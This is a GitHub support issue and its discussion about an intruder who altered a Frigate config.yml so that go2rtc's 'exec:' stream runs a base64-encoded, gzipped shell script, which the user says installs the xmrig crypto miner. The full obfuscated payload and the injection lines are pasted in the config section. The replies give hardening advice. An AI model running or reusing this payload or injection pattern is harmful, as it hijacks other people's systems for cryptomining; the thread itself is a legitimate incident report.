[Support]: Intruder modifies config.yml to download and run crypto mining inside the docker container

[keverets]

Checklist

• I have updated to the latest available Frigate version.
• I have cleared the cache of my browser.
• I have tried a different browser to see if it is related to my browser.
• I have tried reproducing the issue in incognito mode to rule out problems with any third party extensions or plugins I have installed.
• I have asked the AI at https://docs.frigate.video about my issue.

Describe the problem you are having

There's an intruder that is somehow able to access my Frigate instance (it's behind a firewall, and the unauthenticated port 5000 denies access from off machine, so that's another issue I'm hunting down).

The big problem is that they're able to modify the config.yml and restart frigate so that it executes a script which downloads xmrig from github, builds it (they've got it downloading the appropriate dependencies for both debian and alpine linux), and then executes it.

In this instance, they're modifying the go2rtc, streams, debug tag to do:

go2rtc:
  streams:
  debug: exec:/bin/bash -c 'base64 -d<<<H4sI...AA=|zcat|sh'
  log:
    exec: debug

Though the access to the frigate instance is on me (still figuring that out, as I said), the system shouldn't accept this kind of scripting exploit. This is a security issue that should be carefully considered.

I have the full unencrypted script they use in the exploit, if that's of interest.

Steps to reproduce

1. Somehow leave access to the Frigate instance available to an attacker
2. Wait for them to find it
3. Watch as they modify the config.yml and restart the instance to start an exploit (resulting in high load average)

Version

"System page in the Web UI"? There doesn't seem to be one available, and the version doesn't show in the settings or logs. It's the most recent docker pull from 2026-02-05

In which browser(s) are you experiencing the issue with?

No response

Frigate config file

go2rtc:
  streams:
    camera1: ffmpeg:http://(redacted)@192.168.(redacted):80/videostream.cgi?resolution=64#video=h264#hardware # <- use hardware acceleration to create an h264 stream usable for other components.
    debug:                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                         exec:/bin/bash -c 'base64 -d<<<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|zcat|sh'
  log:
    exec: debug
cameras:
  camera1:
    enabled: true
    detect:
      enabled: true
    ffmpeg:
      inputs:
        - path: rtsp://127.0.0.1:8554/camera1
          roles:
            - detect
            - record
  camera2:
    enabled: true
    detect:
      enabled: true
    ffmpeg:
      inputs:
        - path: rtsp://(redacted)/live/ch1
          roles:
            - detect
        - path: rtsp://(redacted)/live/ch0
          roles:
            - record
  healthy:
    ui:
      dashboard: false
    ffmpeg:
      inputs:
        - path: rtsp://127.0.0.1:8554/debug
          roles:
            - record
            - audio
            - detect
    audio:
      enabled: true
detectors:
  coral:
    type: edgetpu
    device: usb
record:
  enabled: true
  retain:
    days: 14
    mode: all
  alerts:
    retain:
      days: 30
  detections:
    retain:
      days: 30
ffmpeg:
  hwaccel_args: preset-vaapi
version: 0.16-0
detect:
  enabled: true

docker-compose file or Docker CLI command

services:
  frigate:
    container_name: frigate
    privileged: true # this may not be necessary for all setups
    restart: unless-stopped
    image: ghcr.io/blakeblackshear/frigate:stable
    shm_size: "64mb" # update for your cameras based on calculation above
    devices:
      - /dev/bus/usb:/dev/bus/usb  # Passes the USB Coral, needs to be modified for other versions
      - /dev/dri/renderD128:/dev/dri/renderD128 # For intel hwaccel, needs to be updated for your hardware
    volumes:
      - /etc/localtime:/etc/localtime:ro
      - /mnt/frigate/config:/config
      - /media/frigate:/media/frigate
      - type: tmpfs # Optional: 1GB of memory, reduces SSD/SD Card wear
        target: /tmp/cache
        tmpfs:
          size: 1000000000
    ports:
      - "5000:5000"
      - "8554:8554" # RTSP feeds
#      - "8555:8555/tcp" # WebRTC over tcp
#      - "8555:8555/udp" # WebRTC over udp
    environment:
      FRIGATE_RTSP_PASSWORD: "(redacted)"
      LIBVA_DRIVER_NAME: i965

Relevant Frigate log output

No relevant

Relevant go2rtc log output

No relevant

Operating system

Debian

Install method

Docker Compose

Network connection

Wired

Camera make and model

Not relevant

Screenshots of the Frigate UI's System metrics pages

Not relevant (if needed, let me know and I'll add it)

Any other information that may be helpful

No response

[inkeep-ai-assistant[bot]]

I understand your concern about this security issue. Let me address the immediate problems and provide guidance.

Immediate Security Issues

You've identified two critical security problems:

1. Exposed port 5000: You have port 5000 exposed in your docker-compose file ("5000:5000"). According to the documentation, port 5000 provides "Internal unauthenticated UI and API access" and "Access to this port should be limited. Intended to be used within the docker network for services that integrate with Frigate."(1) This port should not be exposed externally.

2. Authentication disabled: Your config shows version: 0.16-0, but there's no auth section configured. By default, authentication is enabled in Frigate, but you need to ensure it's properly configured.(2)

Recommended Actions

Immediately secure your installation:

1. Remove the exposed port 5000 from your docker-compose file. Change:

ports:
  - "5000:5000"  # REMOVE THIS LINE
  - "8554:8554"

2. Only expose port 8971 for authenticated access:

ports:
  - "8971:8971"  # Authenticated UI and API access
  - "8554:8554"  # RTSP feeds

(1)

3. Secure your RTSP streams if exposed. The go2rtc restream can be secured with authentication:

go2rtc:
  rtsp:
    username: "admin"
    password: "your_secure_password"
  streams:
    # your streams here

(3)

4. Verify authentication is enabled in your config:

auth:
  enabled: True
  reset_admin_password: False

(2)

5. Use a reverse proxy if you need external access. The documentation states: "Reverse proxies should use this port" (referring to 8971).(1)

About the Exploit Mechanism

The exec: source in go2rtc is a legitimate feature documented for custom ffmpeg commands.(3) However, the security issue here is that an attacker gained write access to your config file and the ability to restart Frigate, not that the feature itself is inherently insecure.

The real vulnerabilities are:

• Exposing unauthenticated port 5000
• Potentially weak or missing authentication
• File system access allowing config modification

Additional Recommendations

After securing the immediate issues:

1. Review your firewall rules to ensure only port 8971 is accessible externally (if needed)
2. Implement proper authentication and consider using a reverse proxy with additional security layers
3. Ensure your /mnt/frigate/config volume mount has appropriate file permissions
4. Review your container's security context - you may not need privileged: true for your setup(1)

The documentation explicitly warns about port 5000: "Access to this port should be limited."(1) This is the primary vector that likely allowed the attack.

📚 Sources:

1. Installation
2. Full Reference Config
3. Restream

---

Have another question? Just tag @inkeep.

[NickM-27]

This has already been adjusted in 0.16.4 so it can't be done by default to use the exec function in the go2rtc config.

Exposing without authentication is never recommended.

[keverets]

I understand, and I'm trying to lock things down. The AI answers end up in me not being able to access the web config at all at the moment.

Good to hear that 0.16.4 has been adjusted. Thanks!

Also, can the github form be updated to be more explicit on where to find the version information to provide? I'd like to have a more complete bug submission next time. Thanks again!